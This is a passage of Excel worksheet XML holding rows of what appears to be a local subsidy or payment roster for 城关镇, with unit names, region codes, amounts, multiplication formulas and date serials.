      </c>
      <c r="E1006" s="24" t="s">
        <v>765</v>
      </c>
      <c r="F1006" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1006" s="24">
        <v>1</v>
      </c>
      <c r="H1006" s="25">
        <v>365</v>
      </c>
      <c r="I1006" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1006" s="41">
        <v>45108</v>
      </c>
      <c r="K1006" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1007" customHeight="1" spans="1:11">
      <c r="A1007" s="23" t="s">
        <v>2683</v>
      </c>
      <c r="B1007" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1007" s="24" t="s">
        <v>1674</v>
      </c>
      <c r="D1007" s="24" t="s">
        <v>2684</v>
      </c>
      <c r="E1007" s="24" t="s">
        <v>273</v>
      </c>
      <c r="F1007" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G1007" s="24">
        <v>1</v>
      </c>
      <c r="H1007" s="25">
        <v>365</v>
      </c>
      <c r="I1007" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1007" s="41">
        <v>45108</v>
      </c>
      <c r="K1007" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1008" customHeight="1" spans="1:11">
      <c r="A1008" s="23" t="s">
        <v>2685</v>
      </c>
      <c r="B1008" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1008" s="24" t="s">
        <v>2051</v>
      </c>
      <c r="D1008" s="24" t="s">
        <v>2686</v>
      </c>
      <c r="E1008" s="24" t="s">
        <v>1545</v>
      </c>
      <c r="F1008" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G1008" s="24">
        <v>2</v>
      </c>
      <c r="H1008" s="25">
        <v>325</v>
      </c>
      <c r="I1008" s="24">
        <f t="shared" si="15"/>
        <v>650</v>
      </c>
      <c r="J1008" s="41">
        <v>45108</v>
      </c>
      <c r="K1008" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1009" customHeight="1" spans="1:11">
      <c r="A1009" s="23" t="s">
        <v>2687</v>
      </c>
      <c r="B1009" s="24" t="str">
        <f>B1008</f>
        <v>城关镇</v>
      </c>
      <c r="C1009" s="24" t="str">
        <f>C1008</f>
        <v>西北社区</v>
      </c>
      <c r="D1009" s="30" t="s">
        <v>2688</v>
      </c>
      <c r="E1009" s="30" t="s">
        <v>2689</v>
      </c>
      <c r="F1009" s="24" t="str">
        <f>F1008</f>
        <v>4113210106</v>
      </c>
      <c r="G1009" s="24"/>
      <c r="H1009" s="24"/>
      <c r="I1009" s="24">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="J1009" s="24"/>
      <c r="K1009" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1010" customHeight="1" spans="1:11">
      <c r="A1010" s="23" t="s">
        <v>2690</v>
      </c>
      <c r="B1010" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1010" s="24" t="s">
        <v>1674</v>
      </c>
      <c r="D1010" s="24" t="s">
        <v>2691</v>
      </c>
      <c r="E1010" s="24" t="s">
        <v>1065</v>
      </c>
      <c r="F1010" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G1010" s="24">
        <v>1</v>
      </c>
      <c r="H1010" s="25">
        <v>365</v>
      </c>
      <c r="I1010" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1010" s="24">
        <v>45139</v>
      </c>
      <c r="K1010" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1011" customHeight="1" spans="1:11">
      <c r="A1011" s="23" t="s">
        <v>2692</v>
      </c>
      <c r="B1011" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1011" s="24" t="s">
        <v>1674</v>
      </c>
      <c r="D1011" s="24" t="s">
        <v>2693</v>
      </c>
      <c r="E1011" s="24" t="s">
        <v>915</v>
      </c>
      <c r="F1011" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G1011" s="24">
        <v>1</v>
      </c>
      <c r="H1011" s="25">
        <v>365</v>
      </c>
      <c r="I1011" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1011" s="24">
        <v>45139</v>
      </c>
      <c r="K1011" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1012" customHeight="1" spans="1:11">
      <c r="A1012" s="23" t="s">
        <v>2694</v>
      </c>
      <c r="B1012" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1012" s="24" t="s">
        <v>2035</v>
      </c>
      <c r="D1012" s="24" t="s">
        <v>2695</v>
      </c>
      <c r="E1012" s="24" t="s">
        <v>239</v>
      </c>
      <c r="F1012" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G1012" s="24">
        <v>1</v>
      </c>
      <c r="H1012" s="25">
        <v>365</v>
      </c>
      <c r="I1012" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1012" s="24">
        <v>45139</v>
      </c>
      <c r="K1012" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1013" customHeight="1" spans="1:11">
      <c r="A1013" s="23" t="s">
        <v>2696</v>
      </c>
      <c r="B1013" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1013" s="24" t="s">
        <v>2035</v>
      </c>
      <c r="D1013" s="24" t="s">
        <v>2697</v>
      </c>
      <c r="E1013" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F1013" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G1013" s="24">
        <v>1</v>
      </c>
      <c r="H1013" s="25">
        <v>365</v>
      </c>
      <c r="I1013" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1013" s="24">
        <v>45139</v>
      </c>
      <c r="K1013" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1014" customHeight="1" spans="1:11">
      <c r="A1014" s="23" t="s">
        <v>2698</v>
      </c>
      <c r="B1014" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1014" s="24" t="s">
        <v>2699</v>
      </c>
      <c r="D1014" s="24" t="s">
        <v>2700</v>
      </c>
      <c r="E1014" s="24" t="s">
        <v>2701</v>
      </c>
      <c r="F1014" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1014" s="24">
        <v>1</v>
      </c>
      <c r="H1014" s="25">
        <v>365</v>
      </c>
      <c r="I1014" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1014" s="24">
        <v>45139</v>
      </c>
      <c r="K1014" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1015" customHeight="1" spans="1:11">
      <c r="A1015" s="23" t="s">
        <v>2702</v>
      </c>
      <c r="B1015" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1015" s="24" t="s">
        <v>2703</v>
      </c>
      <c r="D1015" s="24" t="s">
        <v>2704</v>
      </c>
      <c r="E1015" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F1015" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1015" s="24">
        <v>1</v>
      </c>
      <c r="H1015" s="25">
        <v>365</v>
      </c>
      <c r="I1015" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1015" s="24">
        <v>45139</v>
      </c>
      <c r="K1015" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1016" customHeight="1" spans="1:11">
      <c r="A1016" s="23" t="s">
        <v>2705</v>
      </c>
      <c r="B1016" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1016" s="24" t="s">
        <v>2706</v>
      </c>
      <c r="D1016" s="24" t="s">
        <v>2707</v>
      </c>
      <c r="E1016" s="24" t="s">
        <v>2708</v>
      </c>
      <c r="F1016" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1016" s="24">
        <v>1</v>
      </c>
      <c r="H1016" s="25">
        <v>365</v>
      </c>
      <c r="I1016" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1016" s="24">
        <v>45139</v>
      </c>
      <c r="K1016" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1017" customHeight="1" spans="1:11">
      <c r="A1017" s="23" t="s">
        <v>2709</v>
      </c>
      <c r="B1017" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1017" s="24" t="s">
        <v>2710</v>
      </c>
      <c r="D1017" s="24" t="s">
        <v>2711</v>
      </c>
      <c r="E1017" s="24" t="s">
        <v>561</v>
      </c>
      <c r="F1017" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1017" s="24">
        <v>1</v>
      </c>
      <c r="H1017" s="25">
        <v>365</v>
      </c>
      <c r="I1017" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1017" s="24">
        <v>45139</v>
      </c>
      <c r="K1017" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1018" customHeight="1" spans="1:11">
      <c r="A1018" s="23" t="s">
        <v>2712</v>
      </c>
      <c r="B1018" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1018" s="24" t="s">
        <v>2713</v>
      </c>
      <c r="D1018" s="24" t="s">
        <v>2714</v>
      </c>
      <c r="E1018" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F1018" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1018" s="24">
        <v>3</v>
      </c>
      <c r="H1018" s="25">
        <v>290</v>
      </c>
      <c r="I1018" s="24">
        <f t="shared" si="15"/>
        <v>870</v>
      </c>
      <c r="J1018" s="24">
        <v>45139</v>
      </c>
      <c r="K1018" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1019" customHeight="1" spans="1:11">
      <c r="A1019" s="23" t="s">
        <v>2715</v>
      </c>
      <c r="B1019" s="24" t="str">
        <f>B1018</f>
        <v>城关镇</v>
      </c>
      <c r="C1019" s="24" t="str">
        <f>C1018</f>
        <v>税务局中华办理</v>
      </c>
      <c r="D1019" s="26" t="s">
        <v>2716</v>
      </c>
      <c r="E1019" s="26" t="s">
        <v>1668</v>
      </c>
      <c r="F1019" s="24" t="str">
        <f>F1018</f>
        <v>4113210108</v>
      </c>
      <c r="G1019" s="24"/>
      <c r="H1019" s="24"/>
      <c r="I1019" s="24">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="J1019" s="24"/>
      <c r="K1019" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1020" customHeight="1" spans="1:11">
      <c r="A1020" s="23" t="s">
        <v>2717</v>
      </c>
      <c r="B1020" s="24" t="str">
        <f>B1019</f>
        <v>城关镇</v>
      </c>
      <c r="C1020" s="24" t="str">
        <f>C1019</f>
        <v>税务局中华办理</v>
      </c>
      <c r="D1020" s="26" t="s">
        <v>2718</v>
      </c>
      <c r="E1020" s="26" t="s">
        <v>597</v>
      </c>
      <c r="F1020" s="24" t="str">
        <f>F1019</f>
        <v>4113210108</v>
      </c>
      <c r="G1020" s="24"/>
      <c r="H1020" s="24"/>
      <c r="I1020" s="24">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="J1020" s="24"/>
      <c r="K1020" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1021" customHeight="1" spans="1:11">
      <c r="A1021" s="23" t="s">
        <v>2719</v>
      </c>
      <c r="B1021" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1021" s="24" t="s">
        <v>2720</v>
      </c>
      <c r="D1021" s="24" t="s">
        <v>2721</v>
      </c>
      <c r="E1021" s="24" t="s">
        <v>340</v>
      </c>
      <c r="F1021" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1021" s="24">
        <v>1</v>
      </c>
      <c r="H1021" s="25">
        <v>365</v>
      </c>
      <c r="I1021" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1021" s="24">
        <v>45139</v>
      </c>
      <c r="K1021" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1022" customHeight="1" spans="1:11">
      <c r="A1022" s="23" t="s">
        <v>2722</v>
      </c>
      <c r="B1022" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1022" s="24" t="s">
        <v>2723</v>
      </c>
      <c r="D1022" s="24" t="s">
        <v>2724</v>
      </c>
      <c r="E1022" s="24" t="s">
        <v>2725</v>
      </c>
      <c r="F1022" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1022" s="24">
        <v>1</v>
      </c>
      <c r="H1022" s="25">
        <v>365</v>
      </c>
      <c r="I1022" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1022" s="24">
        <v>45139</v>
      </c>
      <c r="K1022" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1023" customHeight="1" spans="1:11">
      <c r="A1023" s="23" t="s">
        <v>2726</v>
      </c>
      <c r="B1023" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1023" s="24" t="s">
        <v>2727</v>
      </c>
      <c r="D1023" s="24" t="s">
        <v>2728</v>
      </c>
      <c r="E1023" s="24" t="s">
        <v>497</v>
      </c>
      <c r="F1023" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1023" s="24">
        <v>1</v>
      </c>
      <c r="H1023" s="25">
        <v>365</v>
      </c>
      <c r="I1023" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1023" s="24">
        <v>45139</v>
      </c>
      <c r="K1023" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1024" customHeight="1" spans="1:11">
      <c r="A1024" s="23" t="s">
        <v>2729</v>
      </c>
      <c r="B1024" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1024" s="24" t="s">
        <v>2730</v>
      </c>
      <c r="D1024" s="24" t="s">
        <v>2731</v>
      </c>
      <c r="E1024" s="24" t="s">
        <v>765</v>
      </c>
      <c r="F1024" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1024" s="24">
        <v>1</v>
      </c>
      <c r="H1024" s="25">
        <v>365</v>
      </c>
      <c r="I1024" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1024" s="24">
        <v>45139</v>
      </c>
      <c r="K1024" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1025" customHeight="1" spans="1:11">
      <c r="A1025" s="23" t="s">
        <v>2732</v>
      </c>
      <c r="B1025" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1025" s="24" t="s">
        <v>2733</v>
      </c>
      <c r="D1025" s="24" t="s">
        <v>2734</v>
      </c>
      <c r="E1025" s="24" t="s">
        <v>915</v>
      </c>
      <c r="F1025" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G1025" s="24">
        <v>1</v>
      </c>
      <c r="H1025" s="25">
        <v>365</v>
      </c>
      <c r="I1025" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1025" s="24">
        <v>45139</v>
      </c>
      <c r="K1025" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1026" customHeight="1" spans="1:11">
      <c r="A1026" s="23" t="s">
        <v>2735</v>
      </c>
      <c r="B1026" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1026" s="24" t="s">
        <v>2736</v>
      </c>
      <c r="D1026" s="24" t="s">
        <v>2737</v>
      </c>
      <c r="E1026" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F1026" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G1026" s="24">
        <v>1</v>
      </c>
      <c r="H1026" s="25">
        <v>365</v>
      </c>
      <c r="I1026" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1026" s="24">
        <v>45139</v>
      </c>
      <c r="K1026" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1027" customHeight="1" spans="1:11">
      <c r="A1027" s="23" t="s">
        <v>2738</v>
      </c>
      <c r="B1027" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1027" s="24" t="s">
        <v>2736</v>
      </c>
      <c r="D1027" s="24" t="s">
        <v>2739</v>
      </c>
      <c r="E1027" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F1027" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G1027" s="24">
        <v>1</v>
      </c>
      <c r="H1027" s="25">
        <v>365</v>
      </c>
      <c r="I1027" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1027" s="24">
        <v>45139</v>
      </c>
      <c r="K1027" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1028" customHeight="1" spans="1:11">
      <c r="A1028" s="23" t="s">
        <v>2740</v>
      </c>
      <c r="B1028" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1028" s="24" t="s">
        <v>2741</v>
      </c>
      <c r="D1028" s="24" t="s">
        <v>2742</v>
      </c>
      <c r="E1028" s="24" t="s">
        <v>323</v>
      </c>
      <c r="F1028" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G1028" s="24">
        <v>1</v>
      </c>
      <c r="H1028" s="25">
        <v>365</v>
      </c>
      <c r="I1028" s="24">
        <f t="shared" ref="I1028:I1091" si="16">H1028*G1028</f>
        <v>365</v>
      </c>
      <c r="J1028" s="24">
        <v>45139</v>
      </c>
      <c r="K1028" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1029" customHeight="1" spans="1:11">
      <c r="A1029" s="23" t="s">
        <v>2743</v>
      </c>
      <c r="B1029" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1029" s="24" t="s">
        <v>2744</v>
      </c>
      <c r="D1029" s="24" t="s">
        <v>2745</v>
      </c>
      <c r="E1029" s="24" t="s">
        <v>2746</v>
      </c>
      <c r="F1029" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G1029" s="24">
        <v>1</v>
      </c>
      <c r="H1029" s="25">
        <v>365</v>
      </c>
      <c r="I1029" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1029" s="24">
        <v>45139</v>
      </c>
      <c r="K1029" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1030" customHeight="1" spans="1:11">
      <c r="A1030" s="23" t="s">
        <v>2747</v>
      </c>
      <c r="B1030" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1030" s="24" t="s">
        <v>2748</v>
      </c>
      <c r="D1030" s="24" t="s">
        <v>2749</v>
      </c>
      <c r="E1030" s="24" t="s">
        <v>697</v>
      </c>
      <c r="F1030" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1030" s="24">
        <v>1</v>
      </c>
      <c r="H1030" s="25">
        <v>365</v>
      </c>
      <c r="I1030" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1030" s="24">
        <v>45139</v>
      </c>
      <c r="K1030" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1031" customHeight="1" spans="1:11">
      <c r="A1031" s="23" t="s">
        <v>2750</v>
      </c>
      <c r="B1031" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1031" s="24" t="s">
        <v>2751</v>
      </c>
      <c r="D1031" s="24" t="s">
        <v>2752</v>
      </c>
      <c r="E1031" s="24" t="s">
        <v>2753</v>
      </c>
      <c r="F1031" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1031" s="24">
        <v>1</v>
      </c>
      <c r="H1031" s="25">
        <v>365</v>
      </c>
      <c r="I1031" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1031" s="24">
        <v>45139</v>
      </c>
      <c r="K1031" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1032" customHeight="1" spans="1:11">
      <c r="A1032" s="23" t="s">
        <v>2754</v>
      </c>
      <c r="B1032" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1032" s="24" t="s">
        <v>2755</v>
      </c>
      <c r="D1032" s="24" t="s">
        <v>2756</v>
      </c>
      <c r="E1032" s="24" t="s">
        <v>915</v>
      </c>
      <c r="F1032" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1032" s="24">
        <v>2</v>
      </c>
      <c r="H1032" s="25">
        <v>325</v>
      </c>
      <c r="I1032" s="24">
        <f t="shared" si="16"/>
        <v>650</v>
      </c>
      <c r="J1032" s="24">
        <v>45139</v>
      </c>
      <c r="K1032" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1033" customHeight="1" spans="1:11">
      <c r="A1033" s="23" t="s">
        <v>2757</v>
      </c>
      <c r="B1033" s="24" t="str">
        <f>B1032</f>
        <v>城关镇</v>
      </c>
      <c r="C1033" s="24" t="str">
        <f>C1032</f>
        <v>外贸局中华办理</v>
      </c>
      <c r="D1033" s="26" t="s">
        <v>2758</v>
      </c>
      <c r="E1033" s="26" t="s">
        <v>624</v>
      </c>
      <c r="F1033" s="24" t="str">
        <f>F1032</f>
        <v>4113210108</v>
      </c>
      <c r="G1033" s="24"/>
      <c r="H1033" s="24"/>
      <c r="I1033" s="24">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="J1033" s="24"/>
      <c r="K1033" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1034" customHeight="1" spans="1:11">
      <c r="A1034" s="23" t="s">
        <v>2759</v>
      </c>
      <c r="B1034" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1034" s="24" t="s">
        <v>2760</v>
      </c>
      <c r="D1034" s="24" t="s">
        <v>2761</v>
      </c>
      <c r="E1034" s="24" t="s">
        <v>611</v>
      </c>
      <c r="F1034" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1034" s="24">
        <v>1</v>
      </c>
      <c r="H1034" s="25">
        <v>365</v>
      </c>
      <c r="I1034" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1034" s="24">
        <v>45139</v>
      </c>
      <c r="K1034" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1035" customHeight="1" spans="1:11">
      <c r="A1035" s="23" t="s">
        <v>2762</v>
      </c>
      <c r="B1035" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1035" s="24" t="s">
        <v>2763</v>
      </c>
      <c r="D1035" s="24" t="s">
        <v>2764</v>
      </c>
      <c r="E1035" s="24" t="s">
        <v>977</v>
      </c>
      <c r="F1035" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1035" s="24">
        <v>1</v>
      </c>
      <c r="H1035" s="25">
        <v>365</v>
      </c>
      <c r="I1035" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1035" s="24">
        <v>45139</v>
      </c>
      <c r="K1035" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1036" customHeight="1" spans="1:11">
      <c r="A1036" s="23" t="s">
        <v>2765</v>
      </c>
      <c r="B1036" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1036" s="24" t="s">
        <v>2766</v>
      </c>
      <c r="D1036" s="24" t="s">
        <v>2767</v>
      </c>
      <c r="E1036" s="24" t="s">
        <v>2768</v>
      </c>
      <c r="F1036" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G1036" s="24">
        <v>1</v>
      </c>
      <c r="H1036" s="25">
        <v>365</v>
      </c>
      <c r="I1036" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1036" s="24">
        <v>45139</v>
      </c>
      <c r="K1036" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1037" customHeight="1" spans="1:11">
      <c r="A1037" s="23" t="s">
        <v>2769</v>
      </c>
      <c r="B1037" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1037" s="24" t="s">
        <v>2770</v>
      </c>
      <c r="D1037" s="24" t="s">
        <v>2771</v>
      </c>
      <c r="E1037" s="24" t="s">
        <v>2772</v>
      </c>
      <c r="F1037" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1037" s="24">
        <v>1</v>
      </c>
      <c r="H1037" s="25">
        <v>365</v>
      </c>
      <c r="I1037" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1037" s="24">
        <v>45139</v>
      </c>
      <c r="K1037" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1038" customHeight="1" spans="1:11">
      <c r="A1038" s="23" t="s">
        <v>2773</v>
      </c>
      <c r="B1038" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1038" s="24" t="s">
        <v>2774</v>
      </c>
      <c r="D1038" s="24" t="s">
        <v>2775</v>
      </c>
      <c r="E1038" s="24" t="s">
        <v>2306</v>
      </c>
      <c r="F1038" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G1038" s="24">
        <v>1</v>
      </c>
      <c r="H1038" s="25">
        <v>365</v>
      </c>
      <c r="I1038" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1038" s="24">
        <v>45139</v>
      </c>
      <c r="K1038" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1039" customHeight="1" spans="1:11">
      <c r="A1039" s="23" t="s">
        <v>2776</v>
      </c>
      <c r="B1039" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1039" s="24" t="s">
        <v>2777</v>
      </c>
      <c r="D1039" s="24" t="s">
        <v>2778</v>
      </c>
      <c r="E1039" s="24" t="s">
        <v>2779</v>
      </c>
      <c r="F1039" s="24" t="s">
        <v>1970</v>
      </c>
      <c r="G1039" s="24">
        <v>1</v>
      </c>
      <c r="H1039" s="25">
        <v>365</v>
      </c>
      <c r="I1039" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1039" s="24">
        <v>45139</v>
      </c>
      <c r="K1039" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1040" customHeight="1" spans="1:11">
      <c r="A1040" s="23" t="s">
        <v>2780</v>
      </c>
      <c r="B1040" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1040" s="24" t="s">
        <v>2051</v>
      </c>
      <c r="D1040" s="24" t="s">
        <v>2781</v>
      </c>
      <c r="E1040" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F1040" s="24">
        <v>4113210417</v>
      </c>
      <c r="G1040" s="24">
        <v>1</v>
      </c>
      <c r="H1040" s="25">
        <v>365</v>
      </c>
      <c r="I1040" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1040" s="24">
        <v>45170</v>
      </c>
      <c r="K1040" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1041" customHeight="1" spans="1:11">
      <c r="A1041" s="23" t="s">
        <v>2782</v>
      </c>
      <c r="B1041" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1041" s="24" t="s">
        <v>2051</v>
      </c>
      <c r="D1041" s="24" t="s">
        <v>2783</v>
      </c>
      <c r="E1041" s="24" t="s">
        <v>334</v>
      </c>
      <c r="F1041" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1041" s="24">
        <v>1</v>
      </c>
      <c r="H1041" s="25">
        <v>365</v>
      </c>
      <c r="I1041" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1041" s="24">
        <v>45170</v>
      </c>
      <c r="K1041" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1042" customHeight="1" spans="1:11">
      <c r="A1042" s="23" t="s">
        <v>2784</v>
      </c>
      <c r="B1042" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1042" s="24" t="s">
        <v>2051</v>
      </c>
      <c r="D1042" s="24" t="s">
        <v>2785</v>
      </c>
      <c r="E1042" s="24" t="s">
        <v>432</v>
      </c>
      <c r="F1042" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1042" s="24">
        <v>2</v>
      </c>
      <c r="H1042" s="25">
        <v>325</v>
      </c>
      <c r="I1042" s="24">
        <f t="shared" si="16"/>
        <v>650</v>
      </c>
      <c r="J1042" s="24">
        <v>45170</v>
      </c>
      <c r="K1042" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1043" customHeight="1" spans="1:11">
      <c r="A1043" s="23" t="s">
        <v>2786</v>
      </c>
      <c r="B1043" s="24" t="str">
        <f>B1042</f>
        <v>城关镇</v>
      </c>
      <c r="C1043" s="24" t="str">
        <f>C1042</f>
        <v>西北社区</v>
      </c>
      <c r="D1043" s="26" t="s">
        <v>2787</v>
      </c>
      <c r="E1043" s="26" t="s">
        <v>269</v>
      </c>
      <c r="F1043" s="24" t="str">
        <f>F1042</f>
        <v>4113210108</v>
      </c>
      <c r="G1043" s="24"/>
      <c r="H1043" s="24"/>
      <c r="I1043" s="24">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="J1043" s="24"/>
      <c r="K1043" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1044" customHeight="1" spans="1:11">
      <c r="A1044" s="23" t="s">
        <v>2788</v>
      </c>
      <c r="B1044" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1044" s="24" t="s">
        <v>2789</v>
      </c>
      <c r="D1044" s="24" t="s">
        <v>2790</v>
      </c>
      <c r="E1044" s="24" t="s">
        <v>2791</v>
      </c>
      <c r="F1044" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1044" s="24">
        <v>2</v>
      </c>
      <c r="H1044" s="25">
        <v>325</v>
      </c>
      <c r="I1044" s="24">
        <f t="shared" si="16"/>
        <v>650</v>
      </c>
      <c r="J1044" s="24">
        <v>45170</v>
      </c>
      <c r="K1044" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1045" customHeight="1" spans="1:11">
      <c r="A1045" s="23" t="s">
        <v>2792</v>
      </c>
      <c r="B1045" s="24" t="str">
        <f>B1044</f>
        <v>城关镇</v>
      </c>
      <c r="C1045" s="24" t="str">
        <f>C1044</f>
        <v>医药局西北办理</v>
